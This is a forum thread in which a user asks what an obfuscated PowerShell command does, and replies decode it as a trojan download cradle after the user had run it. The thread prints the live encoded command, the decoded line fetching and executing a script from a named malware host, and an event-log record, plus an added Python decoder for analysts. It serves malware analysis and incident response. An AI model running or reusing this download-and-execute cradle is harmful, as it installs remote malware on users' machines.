Please help to understand command

  • Question

  • Could you please help me understand this line?

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116

    Sunday, November 11, 2018 3:30 PM

All replies

  • It is just pointless nonsense that looks like part of a malware attempt to execute some piece of code, but the command line is horribly broken.


    \_(ツ)_/


    Sunday, November 11, 2018 3:38 PM
  • I'm sorry, I did not post the whole line; here it is:

    \System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116 ,145 ,164,56 , 127, 145, 142,103, 154 ,151, 145 , 156 ,164 ,51 , 51 , 56 , 104, 157 , 167 , 156,154 , 157 , 141 ,144, 123 ,164, 162,151 ,156, 147,50,47,150 , 164 ,164,160,72 ,57 ,57,172 ,166 , 142 ,56 , 165,163 ,57, 61,47,51 ,73 ,111,105 , 130,40 , 44 , 141,163, 160 , 170)| ForeACh{( [CHAR] ([ConveRt]::TOiNt16( ( [stRing]$_) ,8 ) ))} )) EngineVersion=5.1.15063.1387 RunspaceId=55df57fe-ca17-4a46-9b64-33d7e9fed2e4 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=

    Sunday, November 11, 2018 3:56 PM
  • Still junk and an attempt at malware.  It could also be a mistake by someone who doesn't know PowerShell.


    \_(ツ)_/

    Sunday, November 11, 2018 4:06 PM
  • Looks like it's trying to run Internet Explorer, visit a web site at zvb.us, and download (and maybe run) a file.

    It's still a broken command line, though.


    --- Rich Matheisen MCSE&I, Exchange Ex-MVP (16 years)

    Sunday, November 11, 2018 4:19 PM
  • PS D:\scripts>  ( $pshOmE[4]+$PShoMe[30]+'X')
    ieX
    PS D:\scripts> Get-Alias ( $pshOmE[4]+$PShoMe[30]+'X')
    
    CommandType     Name                                               Version    Source
    -----------     ----                                               -------    ------
    Alias           iex -> Invoke-Expression
    
    
    PS D:\scripts>


    \_(ツ)_/

    Sunday, November 11, 2018 4:21 PM
  • The code is designed to download a uuencoded string and execute it.  It is a trojan.

    PS D:\scripts>             (
    >>                 -JoiN(
    >>                     (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116,145 ,164,56 ,
     127, 145, 142,103, 154 ,151, 145 , 156 ,164 ,51 , 51 , 56 , 104, 157 , 167 , 156,154 , 157 , 141 ,144, 123 ,164, 162,151 ,156, 147,50,47,150 , 164 ,164,160,72 ,57 ,57,172
    ,166 , 142 ,56 , 165,163 ,57, 61,47,51 ,73 ,111,105 , 130,40 , 44 , 141,163,160 , 170) |
    >>                     ForeACh{
    >>                             ( [CHAR] ([ConveRt]::TOiNt16( ( [stRing]$_) ,8 ) ))
    >>                     }
    >>                 )
    >>             )
    $aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx
    PS D:\scripts>
    The encoded string is huge and is likely a script that runs system utilities to find security holes.  This thing may download more elements as needed. 


    \_(ツ)_/


    Sunday, November 11, 2018 4:28 PM
  • $aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1')
    PS D:\scripts> $aspx.length
    111856
    

    The string is decrypted with its own descriptor at the end of the string.

    At the end of $aspx it decodes and executes iex again.

    The end "EngineVersion=5.1.15063.1387 RunspaceId=55df57fe-ca17-4a46-9b64-33d7e9fed2e4 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= "

    Seems to have nothing to do with the rest of this and it is also missing the executer.


    \_(ツ)_/

    Sunday, November 11, 2018 4:39 PM
  • My situation is that I accidentally executed this malware thing (only once), and now I'm trying to figure out what damage has been done. I've found these logs from PowerShell; I hope there's something useful there.

    Log Name:      Windows PowerShell
    Source:        PowerShell
    Date:          11-Nov-18 5:29:40 PM
    Event ID:      600
    Task Category: Provider Lifecycle
    Level:         Information
    Keywords:      Classic
    User:          N/A
    Computer:      Notebook
    Description:
    Provider "Registry" is Started.

    Details:
        ProviderName=Registry
        NewProviderState=Started

        SequenceNumber=1

        HostName=ConsoleHost
        HostVersion=5.1.15063.1387
        HostId=cc7abe6f-5592-4551-81a5-05e3a877021a
        HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116 ,145 ,164,56 , 127, 145, 142,103, 154 ,151, 145 , 156 ,164 ,51 , 51 , 56 , 104, 157 , 167 , 156,154 , 157 , 141 ,144, 123 ,164, 162,151 ,156, 147,50,47,150 , 164 ,164,160,72 ,57 ,57,172 ,166 , 142 ,56 , 165,163 ,57, 61,47,51 ,73 ,111,105 , 130,40 , 44 , 141,163, 160 , 170)| ForeACh{( [CHAR] ([ConveRt]::TOiNt16( ( [stRing]$_) ,8 ) ))} ))
        EngineVersion=
        RunspaceId=
        PipelineId=
        CommandName=
        CommandType=
        ScriptName=
        CommandPath=
        CommandLine=



    Sunday, November 11, 2018 6:04 PM
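As an added analyst aid (not code from the thread), the Python below does in one step what the replies did interactively: it takes the HostApplication value from the Event ID 600 record, resolves the $PSHOME indexing to the alias it spells, decodes the octal character list, and pulls out the URL to block or hunt for in proxy and DNS logs. The PSHOME value is the default 64-bit path and is an assumption; the log line is a constructed copy of the one posted.

```python
import re

# Default $PSHOME on 64-bit Windows; the command spells "ieX" by indexing into it.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# Constructed sample: the HostApplication field from the Event ID 600 record above,
# with the octal list reproduced as it appears in the thread.
LOGGED_CMDLINE = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . "
    "( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , "
    "145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116 ,145 ,164,56 , "
    "127, 145, 142,103, 154 ,151, 145 , 156 ,164 ,51 , 51 , 56 , 104, 157 , 167 , 156,154 , 157 , 141 ,144, "
    "123 ,164, 162,151 ,156, 147,50,47,150 , 164 ,164,160,72 ,57 ,57,172 ,166 , 142 ,56 , 165,163 ,57, "
    "61,47,51 ,73 ,111,105 , 130,40 , 44 , 141,163, 160 , 170)| ForeACh{( [CHAR] ([ConveRt]::TOiNt16( "
    "( [stRing]$_) ,8 ) ))} ))"
)

def eval_pshome_concat(expr):
    """Evaluate $pshOmE[4]+$PShoMe[30]+'X' (any case) to the alias it spells: 'ieX'."""
    out = []
    for term in (t.strip() for t in expr.split("+")):
        m = re.fullmatch(r"\$pshome\[(\d+)\]", term, flags=re.IGNORECASE)
        if m:
            out.append(PSHOME[int(m.group(1))])
        elif len(term) >= 2 and term[0] == term[-1] and term[0] in "'\"":
            out.append(term[1:-1])               # quoted literal such as 'X'
        else:
            raise ValueError(f"unsupported term: {term!r}")
    return "".join(out)

def decode_octal_join(text):
    """Recover the string built by -Join((n, n, ...) | ForEach {[char][Convert]::ToInt16($_, 8)}).
    Each number is a base-8 character code; returns None if the construct is absent."""
    m = re.search(r"-join\s*\(\s*\(([\d\s,]+)\)", text, flags=re.IGNORECASE)
    if not m:
        return None
    codes = [n for n in m.group(1).replace(" ", "").split(",") if n]
    return "".join(chr(int(n, 8)) for n in codes)

def analyse(cmdline):
    """What the logged command line really does: the alias invoked, the decoded payload,
    and the URLs in it (the indicators to block and hunt for in proxy/DNS logs)."""
    name = re.search(r"\.\s*\(\s*([^)]+)\)", cmdline)   # the '. ( ... )' dot-source call
    payload = decode_octal_join(cmdline) or ""
    return {
        "invoked_via": eval_pshome_concat(name.group(1)) if name else None,
        "payload": payload,
        "urls": re.findall(r"https?://[^\s'\"()]+", payload),
    }
```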
  • Contact your AV vendor and have them look at it.

    This is not the correct forum for this kind of issue.  It is something that the AV software should catch.


    \_(ツ)_/

    Sunday, November 11, 2018 6:09 PM
  • Yeah, I scanned my PC with AV software and adwcleaner, and they've found nothing. I think I'd better clean my PC to be sure. Thanks for the help.

    Sunday, November 11, 2018 6:15 PM
  • If the AV didn't find it then it will not be cleaned.  The encoded string has a built-in decode and then it is executed.  It is a bStr so it is likely script and not binary.  I suspect there is another download that is a binary that gets installed and that is not being detected.  Let the AV guys see it to see if they can detect what is really being installed.  You won't find it.


    \_(ツ)_/

    Sunday, November 11, 2018 6:27 PM
  • It's a bit of code:

    $aspx = ((New-Object System.Net.WebClient)).DownloadString('http://XXX.us/1');IEX $aspx

    The "xxx.us" was "zvb.us" in the original. It didn't feel right leaving the original site in an executable bit of code. See here:

    http://trafficlight.bitdefender.com/info?url=http://zvb.us


    --- Rich Matheisen MCSE&I, Exchange Ex-MVP (16 years)

    Sunday, November 11, 2018 7:56 PM
  • Yes. That web domain is a hacker domain. It shows up everywhere.  It has a long history.

    It seems to be just a site where any hacker can create a page and park malware on it. This time the page is "1".


    \_(ツ)_/

    Sunday, November 11, 2018 8:00 PM
  • Hi,

    Was your issue resolved?

    If you resolved it using our solution, please "mark it as answer" to help other community members find the helpful reply quickly.

    If you resolve it using your own solution, please share your experience and solution here. It will be very beneficial for other community members who have similar questions.

    If no, please reply and tell us the current situation in order to provide further help.

    Best Regards,

    Lee


    Just do it.

    Tuesday, November 27, 2018 2:26 AM
  • Hi,

    Was your issue resolved?

    If you resolved it using our solution, please "mark it as answer" to help other community members find the helpful reply quickly.

    If you resolve it using your own solution, please share your experience and solution here. It will be very beneficial for other community members who have similar questions.

    If no, please reply and tell us the current situation in order to provide further help.

    Best Regards,

    Lee


    Just do it.

    Tuesday, December 4, 2018 3:07 AM